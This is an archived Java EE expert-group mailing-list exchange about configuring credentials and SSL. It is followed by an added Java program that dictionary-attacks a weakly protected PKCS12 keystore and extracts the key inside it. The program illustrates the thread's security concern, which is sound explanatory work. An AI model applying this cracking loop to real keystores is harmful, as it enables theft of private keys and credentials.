[javaee-spec users] [jsr342-experts] Re: Improved Credential and SSL Configuration for EE 7

From: Jevgeni Kabanov <>
Date: Fri, 9 Mar 2012 08:45:03 +0200

Agreed. We really need a better way to separate the code from configuration.


On Friday, March 9, 2012, Jason T. Greene wrote:

> On 3/8/12 6:09 PM, Bill Shannon wrote:
>> I've uploaded another proposal from our security team. Please review
>> and give us your feedback.
> download/credential-ssl-config-ee7-proposal.pdf<>
> Frankly the whole idea of sticking private keys and password databases in
> deployments seems like a major hazard. Developers are used to copying these
> around everywhere. I could easily see someone forgetting they have
> sensitive information in here. People also tend to use short and bad
> passwords in keystores, which makes brute-forcing a PKCS12 file not that
> difficult.
> --
> Jason T. Greene
> JBoss AS Lead / EAP Platform Architect
> JBoss, a division of Red Hat
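
To make the brute-forcing point concrete, here is a small stand-alone Java program (added as an illustration; it is not code from this thread or from any EE proposal). It builds an in-memory PKCS12 keystore protected by a weak password and then runs a dictionary attack against it using nothing but the standard `KeyStore` API: a wrong store password makes `KeyStore.load` fail its integrity check and throw `IOException`, so each candidate costs one load attempt. The class name, the tiny word list and the choice of a secret-key entry (which PKCS12 in the JDK accepts since Java 8) are assumptions made for the example; `changeit` is included because it is the well-known default password of the JDK's own `cacerts` store.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.security.GeneralSecurityException;
import java.security.KeyStore;
import java.util.Arrays;
import java.util.List;

import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;

/** Demonstrates why a weakly protected PKCS12 file shipped inside a deployment is a hazard. */
public class Pkcs12WeakPasswordDemo {

    /** Builds a PKCS12 keystore holding one AES key, protected by {@code password}. */
    static byte[] buildKeystore(char[] password) throws GeneralSecurityException, IOException {
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(256);
        SecretKey secret = kg.generateKey();

        KeyStore ks = KeyStore.getInstance("PKCS12");
        ks.load(null, null); // initialise an empty store
        ks.setEntry("app-secret",
                new KeyStore.SecretKeyEntry(secret),
                new KeyStore.PasswordProtection(password));

        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ks.store(out, password);
        return out.toByteArray();
    }

    /**
     * Dictionary attack: tries each candidate as the store password.
     * A wrong password fails the PKCS12 integrity (MAC) check, which the JDK
     * reports as an IOException, so we just move on to the next candidate.
     * Returns the recovered password, or null if no candidate matched.
     */
    static String crack(byte[] p12, List<String> candidates) throws GeneralSecurityException {
        for (String candidate : candidates) {
            try {
                KeyStore ks = KeyStore.getInstance("PKCS12");
                ks.load(new ByteArrayInputStream(p12), candidate.toCharArray());
                return candidate; // load succeeded: MAC verified with this password
            } catch (IOException wrongPassword) {
                // expected for every wrong guess; keep going
            }
        }
        return null;
    }

    public static void main(String[] args) throws Exception {
        // Constructed scenario: a developer protects the bundled keystore with "changeit".
        byte[] p12 = buildKeystore("changeit".toCharArray());

        // Constructed word list standing in for a real dictionary of common passwords.
        List<String> wordlist = Arrays.asList(
                "password", "123456", "secret", "admin", "keystore", "changeit", "welcome1");

        long start = System.nanoTime();
        String found = crack(p12, wordlist);
        long elapsedMs = (System.nanoTime() - start) / 1_000_000;

        System.out.println("recovered password: " + found + " (" + elapsedMs + " ms, "
                + wordlist.size() + " candidates)");

        // With the recovered password the attacker can now extract the key material.
        KeyStore ks = KeyStore.getInstance("PKCS12");
        ks.load(new ByteArrayInputStream(p12), found.toCharArray());
        KeyStore.Entry entry = ks.getEntry("app-secret", new KeyStore.PasswordProtection(found.toCharArray()));
        SecretKey leaked = ((KeyStore.SecretKeyEntry) entry).getSecretKey();
        System.out.println("extracted " + leaked.getAlgorithm() + " key, "
                + leaked.getEncoded().length * 8 + " bits");
    }
}
```

Compile and run with `javac Pkcs12WeakPasswordDemo.java && java Pkcs12WeakPasswordDemo`. The only thing standing between an attacker who copied the deployment and the key inside it is the cost of one `KeyStore.load` per guess, which is why the thread's concern is about where the keystore lives and how it is protected rather than about PKCS12 itself.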